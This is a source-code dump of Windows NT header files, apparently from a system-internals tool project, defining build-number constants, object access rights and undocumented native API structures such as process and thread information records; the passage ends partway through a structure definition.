#define _strcmp _strcmp_a
#define _strncmp _strncmp_a
#define _strcmpi _strcmpi_a
#define _strncmpi _strncmpi_a
#define _strstr _strstr_a
#define _strstri _strstri_a
#define _strchr _strchr_a
#define ultostr ultostr_a
#define ultohex ultohex_a
#define itostr itostr_a
#define i64tostr i64tostr_a
#define u64tostr u64tostr_a
#define u64tohex u64tohex_a
#define _strtoul strtoul_a
#define hextoul hextoul_a
#define strtoi strtoi_a
#define strtoi64 strtoi64_a
#define strtou64 strtou64_a
#define hextou64 hextou64_a
#endif
#endif /* _MINIRTL_ */
================================================
FILE: Source/Shared/ntos/ntbuilds.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2021 - 2025
*
* TITLE: NTBUILDS.H
*
* VERSION: 1.28
*
* DATE: 18 Sep 2025
*
* Windows NT builds definition file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//
// Defines for Major Windows NT release builds
//
// Windows 7 RTM
#define NT_WIN7_RTM 7600
// Windows 7 SP1
#define NT_WIN7_SP1 7601
// Windows 8 RTM
#define NT_WIN8_RTM 9200
// Windows 8.1
#define NT_WIN8_BLUE 9600
// Windows 10 TH1
#define NT_WIN10_THRESHOLD1 10240
// Windows 10 TH2
#define NT_WIN10_THRESHOLD2 10586
// Windows 10 RS1
#define NT_WIN10_REDSTONE1 14393
// Windows 10 RS2
#define NT_WIN10_REDSTONE2 15063
// Windows 10 RS3
#define NT_WIN10_REDSTONE3 16299
// Windows 10 RS4
#define NT_WIN10_REDSTONE4 17134
// Windows 10 RS5
#define NT_WIN10_REDSTONE5 17763
// Windows 10 19H1
#define NT_WIN10_19H1 18362
// Windows 10 19H2
#define NT_WIN10_19H2 18363
// Windows 10 20H1
#define NT_WIN10_20H1 19041
// Windows 10 20H2
#define NT_WIN10_20H2 19042
// Windows 10 21H1
#define NT_WIN10_21H1 19043
// Windows 10 21H2
#define NT_WIN10_21H2 19044
// Windows 10 22H2
#define NT_WIN10_22H2 19045
// Windows Server 2022
#define NT_WINSRV_21H1 20348
// Windows 11 21H2
#define NT_WIN11_21H2 22000
// Windows 11 22H2
#define NT_WIN11_22H2 22621
// Windows 11 23H2
#define NT_WIN11_23H2 22631
// Windows 11 24H2
#define NT_WIN11_24H2 26100
// Windows 11 25H2
#define NT_WIN11_25H2 26200
// Windows 11 Active Development Branch
#define NT_WIN11_ADB 27943
================================================
FILE: Source/Shared/ntos/ntos.h
================================================
/************************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2025
* Translated from Microsoft sources/debugger or mentioned elsewhere.
*
* TITLE: NTOS.H
*
* VERSION: 1.237
*
* DATE: 22 Aug 2025
*
* Common header file for the ntos API functions and definitions.
*
* Only projects required API/definitions.
*
* Depends on: Windows.h
* NtStatus.h
*
* Include: Windows.h
* NtStatus.h
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
************************************************************************************/
#if defined (_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#pragma warning(push)
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
#ifndef NTOS_RTL
#define NTOS_RTL
//
// NTOS_RTL HEADER BEGIN
//
//
// Enable LIST_ENTRY macroses.
//
#define NTOS_ENABLE_LIST_ENTRY_MACRO
#if defined(__cplusplus)
#ifndef MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS
#define MICROSOFT_WINDOWS_WINBASE_H_DEFINE_INTERLOCKED_CPLUSPLUS_OVERLOADS 0
#endif
extern "C" {
#endif
#pragma comment(lib, "ntdll.lib")
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000ull
#endif
#ifndef ABSOLUTE_TIME
#define ABSOLUTE_TIME(wait) (wait)
#endif
#ifndef RELATIVE_TIME
#define RELATIVE_TIME(wait) (-(wait))
#endif
#ifndef NANOSECONDS
#define NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)
#endif
#ifndef MICROSECONDS
#define MICROSECONDS(micros) (((signed __int64)(micros)) * NANOSECONDS(1000L))
#endif
#ifndef MILLISECONDS
#define MILLISECONDS(milli) (((signed __int64)(milli)) * MICROSECONDS(1000L))
#endif
#ifndef SECONDS
#define SECONDS(seconds) (((signed __int64)(seconds)) * MILLISECONDS(1000L))
#endif
#ifndef POI //poi-poi
#define POI(addr) *(ULONG *)(addr)
#endif
typedef char CCHAR;
typedef unsigned char UCHAR;
typedef CCHAR KPROCESSOR_MODE;
typedef UCHAR KIRQL;
typedef KIRQL *PKIRQL;
typedef ULONG CLONG;
typedef LONG KPRIORITY;
typedef short CSHORT;
typedef ULONGLONG REGHANDLE, *PREGHANDLE;
typedef PVOID *PDEVICE_MAP;
typedef PVOID PHEAD;
typedef PVOID PEJOB;
typedef PVOID PKTHREAD;
typedef struct _IO_TIMER* PIO_TIMER;
typedef LARGE_INTEGER PHYSICAL_ADDRESS;
typedef struct _EJOB* PESILO;
#ifndef _WIN32_WINNT_WIN10
#define _WIN32_WINNT_WIN10 0x0A00
#endif
#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)
typedef PVOID PMEM_EXTENDED_PARAMETER;
#endif
#ifndef IN_REGION
#define IN_REGION(x, Base, Size) ( \
(((ULONG_PTR)(Base) + (ULONG_PTR)(Size)) > (ULONG_PTR)(Base)) && \
/* x within [Base, Base+Size) */ \
(((ULONG_PTR)(x) >= (ULONG_PTR)(Base)) && ((ULONG_PTR)(x) < ((ULONG_PTR)(Base) + (ULONG_PTR)(Size)))))
#endif
#define PE_SIGNATURE_SIZE 4
#ifndef RTL_MEG
#define RTL_MEG (1024UL * 1024UL)
#endif
#ifndef RTLP_IMAGE_MAX_DOS_HEADER
#define RTLP_IMAGE_MAX_DOS_HEADER (256UL * RTL_MEG)
#endif
#ifndef MM_SIZE_OF_LARGEST_IMAGE
#define MM_SIZE_OF_LARGEST_IMAGE ((ULONG)0x77000000)
#endif
#ifndef MM_MAXIMUM_IMAGE_HEADER
#define MM_MAXIMUM_IMAGE_HEADER (2 * PAGE_SIZE)
#endif
#ifndef MM_MAXIMUM_IMAGE_SECTIONS
#define MM_MAXIMUM_IMAGE_SECTIONS \
((MM_MAXIMUM_IMAGE_HEADER - (PAGE_SIZE + sizeof(IMAGE_NT_HEADERS))) / \
sizeof(IMAGE_SECTION_HEADER))
#endif
//
// Define alignment macros to align structure sizes and pointers up and down.
//
#ifndef ALIGN_UP_TYPE
#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
#endif
#ifndef ALIGN_UP
#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))
#endif
#ifndef ALIGN_DOWN_TYPE
#define ALIGN_DOWN_TYPE(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
#endif
#ifndef ALIGN_DOWN
#define ALIGN_DOWN(Address, Type) ALIGN_DOWN_TYPE(Address, sizeof(Type))
#endif
#ifndef ALIGN_UP_BY
#define ALIGN_UP_BY(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
#endif
#ifndef ALIGN_DOWN_BY
#define ALIGN_DOWN_BY(Address, Align) ((ULONG_PTR)(Address) & ~((ULONG_PTR)(Align) - 1))
#endif
#ifndef ALIGN_UP_POINTER_BY
#define ALIGN_UP_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_UP_BY(Pointer, Align))
#endif
#ifndef ALIGN_DOWN_POINTER_BY
#define ALIGN_DOWN_POINTER_BY(Pointer, Align) ((PVOID)ALIGN_DOWN_BY(Pointer, Align))
#endif
#ifndef ALIGN_UP_POINTER
#define ALIGN_UP_POINTER(Pointer, Type) ((PVOID)ALIGN_UP(Pointer, Type))
#endif
#ifndef ALIGN_DOWN_POINTER
#define ALIGN_DOWN_POINTER(Pointer, Type) ((PVOID)ALIGN_DOWN(Pointer, Type))
#endif
#ifndef ARGUMENT_PRESENT
#define ARGUMENT_PRESENT(ArgumentPointer) (\
(CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) )
#endif
#ifndef LOGICAL
#define LOGICAL ULONG
#endif
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define ZwCurrentProcess() NtCurrentProcess()
#define NtCurrentThread() ((HANDLE)(LONG_PTR)-2)
#define ZwCurrentThread() NtCurrentThread()
#define NtCurrentSession() ((HANDLE)(LONG_PTR)-3)
#define ZwCurrentSession() NtCurrentSession()
//Valid Only for Windows 8+
#define NtCurrentProcessToken() ((HANDLE)(LONG_PTR)-4)
#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)
#define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken
enum _KPROCESSOR_MODE {
KernelMode = 0,
UserMode,
MaximumMode
};
//
// ntdef.h begin
//
#ifndef RTL_CONSTANT_STRING
char _RTL_CONSTANT_STRING_type_check(const void *s);
#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)
#define RTL_CONSTANT_STRING(s) \
{ \
sizeof( s ) - sizeof( (s)[0] ), \
sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
_RTL_CONSTANT_STRING_remove_const_macro(s) \
}
#endif
#ifndef RTL_CONSTANT_OBJECT_ATTRIBUTES
#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
{ sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
#endif
// This synonym is more appropriate for initializing what isn't actually const.
#ifndef RTL_INIT_OBJECT_ATTRIBUTES
#define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a)
#endif
//
// ntdef.h end
//
#ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) ))
#endif
#ifndef RtlPointerToOffset
#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
#endif
//
// Valid values for the OBJECT_ATTRIBUTES.Attributes field
//
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_FORCE_ACCESS_CHECK 0x00000400L
#define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L
#define OBJ_DONT_REPARSE 0x00001000L
#define OBJ_VALID_ATTRIBUTES 0x00001FF2L
#define OBJ_PROTECT_CLOSE 0x00000001L
#define OBJ_AUDIT_OBJECT_CLOSE 0x00000004L
//
// Callback Object Rights
//
#define CALLBACK_MODIFY_STATE 0x0001
#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )
//
// CompositionSurface Access Rights
//
#ifndef COMPOSITIONSURFACE_READ
#define COMPOSITIONSURFACE_READ 0x0001L
#endif
#ifndef COMPOSITIONSURFACE_WRITE
#define COMPOSITIONSURFACE_WRITE 0x0002L
#endif
#ifndef COMPOSITIONSURFACE_ALL_ACCESS
#define COMPOSITIONSURFACE_ALL_ACCESS (COMPOSITIONSURFACE_READ | COMPOSITIONSURFACE_WRITE)
#endif
//
// Debug Object Access Rights
//
#define DEBUG_READ_EVENT (0x0001)
#define DEBUG_PROCESS_ASSIGN (0x0002)
#define DEBUG_SET_INFORMATION (0x0004)
#define DEBUG_QUERY_INFORMATION (0x0008)
#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\
DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)
//
// Directory Object Access Rights
//
#define DIRECTORY_QUERY (0x0001)
#define DIRECTORY_TRAVERSE (0x0002)
#define DIRECTORY_CREATE_OBJECT (0x0004)
#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008)
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
//
// Event Object Access Rights
//
#ifndef EVENT_QUERY_STATE
#define EVENT_QUERY_STATE 0x0001
#endif
#ifndef EVENT_MODIFY_STATE //SDK compatibility
#define EVENT_MODIFY_STATE 0x0002
#endif
#ifndef EVENT_ALL_ACCESS //SDK compatibility
#define EVENT_ALL_ACCESS(EVENT_QUERY_STATE | EVENT_MODIFY_STATE | STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE)
#endif
//
// EventPair Object Access Rights
//
#define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)
//
// I/O Completion Object Access Rights
//
#define IO_COMPLETION_QUERY_STATE 0x0001
#define IO_COMPLETION_MODIFY_STATE 0x0002
#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)
//
// KeyedEvent Object Access Rights
//
#define KEYEDEVENT_WAIT 0x0001
#define KEYEDEVENT_WAKE 0x0002
#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)
//
// Mutant Object Access Rights
//
#ifndef MUTANT_QUERY_STATE //SDK compatibility
#define MUTANT_QUERY_STATE 0x0001
#endif
#ifndef MUTANT_ALL_ACCESS //SDK compatibility
#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)
#endif
//
// Port Object Access Rights
//
#define PORT_CONNECT (0x0001)
#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | PORT_CONNECT)
//
// Filter Port Access Rights
//
#define FLT_PORT_CONNECT 0x0001
#define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT|STANDARD_RIGHTS_ALL)
//
// Profile Object Access Rights
//
#define PROFILE_CONTROL (0x0001)
#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)
//
// Semaphore Object Access Rights
//
#ifndef SEMAPHORE_QUERY_STATE //SDK compatibility
#define SEMAPHORE_QUERY_STATE 0x0001
#endif
#ifndef SEMAPHORE_MODIFY_STATE //SDK compatibility
#define SEMAPHORE_MODIFY_STATE 0x0002
#endif
#ifndef SEMAPHORE_ALL_ACCESS //SDK compatibility
#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|SEMAPHORE_QUERY_STATE|SEMAPHORE_MODIFY_STATE)
#endif
//
// Time Object Access rights
//
#ifndef TIMER_QUERY_STATE
#define TIMER_QUERY_STATE 0x0001
#endif
#ifndef TIMER_MODIFY_STATE
#define TIMER_MODIFY_STATE 0x0002
#endif
#ifndef TIMER_ALL_ACCESS
#define TIMER_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|TIMER_QUERY_STATE|TIMER_MODIFY_STATE)
#endif
//
// SymbolicLink Object Access Rights
//
#define SYMBOLIC_LINK_QUERY 0x0001
#define SYMBOLIC_LINK_SET 0x0002
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYMBOLIC_LINK_QUERY)
#define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF)
//
// Thread Object Access Rights
//
#define THREAD_ALERT (0x0004)
#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001
#define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002
#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x00000040
#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
//
// Worker Factory Object Access Rights
//
#define WORKER_FACTORY_RELEASE_WORKER 0x0001
#define WORKER_FACTORY_WAIT 0x0002
#define WORKER_FACTORY_SET_INFORMATION 0x0004
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
#define WORKER_FACTORY_READY_WORKER 0x0010
#define WORKER_FACTORY_SHUTDOWN 0x0020
#define WORKER_FACTORY_ALL_ACCESS ( \
STANDARD_RIGHTS_REQUIRED | \
WORKER_FACTORY_RELEASE_WORKER | \
WORKER_FACTORY_WAIT | \
WORKER_FACTORY_SET_INFORMATION | \
WORKER_FACTORY_QUERY_INFORMATION | \
WORKER_FACTORY_READY_WORKER | \
WORKER_FACTORY_SHUTDOWN \
)
//
// Type Object Access Rights
//
#define OBJECT_TYPE_CREATE (0x0001)
#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | OBJECT_TYPE_CREATE)
//
// WMI Object Access Rights
//
#define WMIGUID_QUERY 0x0001
#define WMIGUID_SET 0x0002
#define WMIGUID_NOTIFICATION 0x0004
#define WMIGUID_READ_DESCRIPTION 0x0008
#define WMIGUID_EXECUTE 0x0010
#define TRACELOG_CREATE_REALTIME 0x0020
#define TRACELOG_CREATE_ONDISK 0x0040
#define TRACELOG_GUID_ENABLE 0x0080
#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100
#define TRACELOG_LOG_EVENT 0x0200 // used on Vista and greater
#define TRACELOG_CREATE_INPROC 0x0200 // used pre-Vista
#define TRACELOG_ACCESS_REALTIME 0x0400
#define TRACELOG_REGISTER_GUIDS 0x0800
#define TRACELOG_JOIN_GROUP 0x1000
//
// Memory Partition Object Access Rights
//
#ifndef MEMORY_PARTITION_QUERY_ACCESS
#define MEMORY_PARTITION_QUERY_ACCESS 0x0001
#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002
#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \
SYNCHRONIZE | \
MEMORY_PARTITION_QUERY_ACCESS | \
MEMORY_PARTITION_MODIFY_ACCESS)
#endif
//
// Define special ByteOffset parameters for read and write operations
//
#ifndef FILE_WRITE_TO_END_OF_FILE
#define FILE_WRITE_TO_END_OF_FILE 0xffffffff
#endif
#ifndef FILE_USE_FILE_POINTER_POSITION
#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe
#endif
#ifndef FILE_SHARE_VALID_FLAGS
#define FILE_SHARE_VALID_FLAGS FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE
#endif
//
// This is the maximum MaximumLength for a UNICODE_STRING.
//
#ifndef MAXUSHORT
#define MAXUSHORT 0xffff
#endif
#ifndef MAX_USTRING
#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )
#endif
typedef struct _EX_RUNDOWN_REF {
union
{
ULONG Count;
PVOID Ptr;
};
} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF;
#ifdef _WIN64
#define MAX_FAST_REFS 15
#else
#define MAX_FAST_REFS 7
#endif
typedef struct _EX_FAST_REF {
union {
PVOID Object;
#if defined (_WIN64)
ULONG_PTR RefCnt : 4;
#else
ULONG_PTR RefCnt : 3;
#endif
ULONG_PTR Value;
};
} EX_FAST_REF, *PEX_FAST_REF;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#ifndef STATIC_UNICODE_STRING
#define STATIC_UNICODE_STRING(string, value) \
static UNICODE_STRING string = { sizeof(value) - sizeof(WCHAR), sizeof(value), value };
#endif
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
typedef STRING ANSI_STRING;
typedef PSTRING PANSI_STRING;
typedef STRING OEM_STRING;
typedef PSTRING POEM_STRING;
typedef CONST STRING* PCOEM_STRING;
typedef CONST char *PCSZ;
typedef struct _CSTRING {
USHORT Length;
USHORT MaximumLength;
CONST char *Buffer;
} CSTRING;
typedef CSTRING *PCSTRING;
#define ANSI_NULL ((CHAR)0)
typedef STRING CANSI_STRING;
typedef PSTRING PCANSI_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
} DUMMYUNIONNAME;
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
#ifndef INTERFACE_TYPE
typedef enum _INTERFACE_TYPE {
InterfaceTypeUndefined = -1,
Internal = 0,
Isa,
Eisa,
MicroChannel,
TurboChannel,
PCIBus,
VMEBus,
NuBus,
PCMCIABus,
CBus,
MPIBus,
MPSABus,
ProcessorInternal,
InternalPowerBus,
PNPISABus,
PNPBus,
Vmcs,
ACPIBus,
MaximumInterfaceType
} INTERFACE_TYPE, * PINTERFACE_TYPE;
#endif
/*
** FileCache and MemoryList START
*/
typedef enum _SYSTEM_MEMORY_LIST_COMMAND {
MemoryCaptureAccessedBits,
MemoryCaptureAndResetAccessedBits,
MemoryEmptyWorkingSets,
MemoryFlushModifiedList,
MemoryPurgeStandbyList,
MemoryPurgeLowPriorityStandbyList,
MemoryCommandMax
} SYSTEM_MEMORY_LIST_COMMAND;
typedef struct _SYSTEM_FILECACHE_INFORMATION {
SIZE_T CurrentSize;
SIZE_T PeakSize;
ULONG PageFaultCount;
SIZE_T MinimumWorkingSet;
SIZE_T MaximumWorkingSet;
SIZE_T CurrentSizeIncludingTransitionInPages;
SIZE_T PeakSizeIncludingTransitionInPages;
ULONG TransitionRePurposeCount;
ULONG Flags;
} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION;
/*
** FileCache and MemoryList END
*/
/*
** Processes START
*/
typedef struct _SYSTEM_TIMEOFDAY_INFORMATION {
LARGE_INTEGER BootTime;
LARGE_INTEGER CurrentTime;
LARGE_INTEGER TimeZoneBias;
ULONG TimeZoneId;
ULONG Reserved;
ULONGLONG BootTimeBias;
ULONGLONG SleepTimeBias;
} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;
typedef enum _THREAD_STATE {
StateInitialized,
StateReady,
StateRunning,
StateStandby,
StateTerminated,
StateWait,
StateTransition,
StateUnknown
} THREAD_STATE;
typedef enum _KWAIT_REASON {
Executive = 0,
FreePage,
PageIn,
PoolAllocation,
DelayExecution,
Suspended,
UserRequest,
WrExecutive,
WrFreePage,
WrPageIn,
WrPoolAllocation,
WrDelayExecution,
WrSuspended,
WrUserRequest,
WrEventPair, //has no effect after 7
WrQueue,
WrLpcReceive,
WrLpcReply,
WrVirtualMemory,
WrPageOut,
WrRendezvous,
WrKeyedEvent,
WrTerminated,
WrProcessInSwap,
WrCpuRateControl,
WrCalloutStack,
WrKernel,
WrResource,
WrPushLock,
WrMutex,
WrQuantumEnd,
WrDispatchInt,
WrPreempted,
WrYieldExecution,
WrFastMutex,
WrGuardedMutex,
WrRundown,
WrAlertByThreadId,
WrDeferredPreempt,
WrPhysicalFault,
WrIoRing,
WrMdlCache,
WrRcu,
MaximumWaitReason
} KWAIT_REASON;
typedef VOID KSTART_ROUTINE(
_In_ PVOID StartContext
);
typedef KSTART_ROUTINE *PKSTART_ROUTINE;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef struct _CLIENT_ID64 {
ULONG64 UniqueProcess;
ULONG64 UniqueThread;
} CLIENT_ID64, *PCLIENT_ID64;
typedef struct _CLIENT_ID32 {
ULONG32 UniqueProcess;
ULONG32 UniqueThread;
} CLIENT_ID32, *PCLIENT_ID32;
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivatePageCount;
} VM_COUNTERS;
typedef struct _SYSTEM_THREAD_INFORMATION {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
THREAD_STATE State;
KWAIT_REASON WaitReason;
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {
SYSTEM_THREAD_INFORMATION ThreadInfo;
PVOID StackBase;
PVOID StackLimit;
PVOID Win32StartAddress;
PVOID TebBase;
ULONG_PTR Reserved2;
ULONG_PTR Reserved3;
ULONG_PTR Reserved4;
} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryDelta;
ULONG ThreadCount;
LARGE_INTEGER WorkingSetPrivateSize;
ULONG HardFaultCount;
ULONG NumberOfThreadsHighWatermark;
ULONGLONG CycleTime;
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ImageName;
KPRIORITY BasePriority;
HANDLE UniqueProcessId;
HANDLE InheritedFromUniqueProcessId;
ULONG HandleCount;
ULONG SessionId;
ULONG_PTR UniqueProcessKey;
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef enum _SYSTEM_PROCESS_CLASSIFICATION {
SystemProcessClassificationNormal,
SystemProcessClassificationSystem,
SystemProcessClassificationSecureSystem,
SystemProcessClassificationMemCompression,
SystemProcessClassificationRegistry,
SystemProcessClassificationMaximum
} SYSTEM_PROCESS_CLASSIFICATION;
typedef struct _PROCESS_DISK_COUNTERS {
ULONGLONG BytesRead;
ULONGLONG BytesWritten;
ULONGLONG ReadOperationCount;
ULONGLONG WriteOperationCount;
ULONGLONG FlushOperationCount;
} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS;
typedef union _ENERGY_STATE_DURATION {
union
{
ULONGLONG Value;
ULONG LastChangeTime;
};
ULONG Duration : 31;
ULONG IsInState : 1;
} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION;
typedef struct _PROCESS_ENERGY_VALUES {
ULONGLONG Cycles[2][4];
ULONGLONG DiskEnergy;
ULONGLONG NetworkTailEnergy;
ULONGLONG MBBTailEnergy;
ULONGLONG NetworkTxRxBytes;
ULONGLONG MBBTxRxBytes;
union
{
ENERGY_STATE_DURATION Durations[3];
struct
{
ENERGY_STATE_DURATION ForegroundDuration;
ENERGY_STATE_DURATION DesktopVisibleDuration;
ENERGY_STATE_DURATION PSMForegroundDuration;
};
};
ULONG CompositionRendered;
ULONG CompositionDirtyGenerated;
ULONG CompositionDirtyPropagated;
ULONG Reserved1;
ULONGLONG AttributedCycles[4][2];
ULONGLONG WorkOnBehalfCycles[4][2];
} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES;
typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {
PROCESS_DISK_COUNTERS DiskCounters;
ULONGLONG ContextSwitches;
union
{
ULONG Flags;
struct
{
ULONG HasStrongId : 1;
ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION
ULONG BackgroundActivityModerated : 1;
ULONG Spare : 26;
};
};
ULONG UserSidOffset;
ULONG PackageFullNameOffset;
PROCESS_ENERGY_VALUES EnergyValues;
ULONG AppIdOffset;
SIZE_T SharedCommitCharge;
ULONG JobObjectId;
ULONG SpareUlong;
ULONGLONG ProcessSequenceNumber;
} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;
typedef struct _SYSTEM_PROCESS_FULL_INFORMATION {
SYSTEM_PROCESS_INFORMATION ProcessAndThreads;
SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;
} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION;
typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
HANDLE ProcessId;
UNICODE_STRING ImageName;
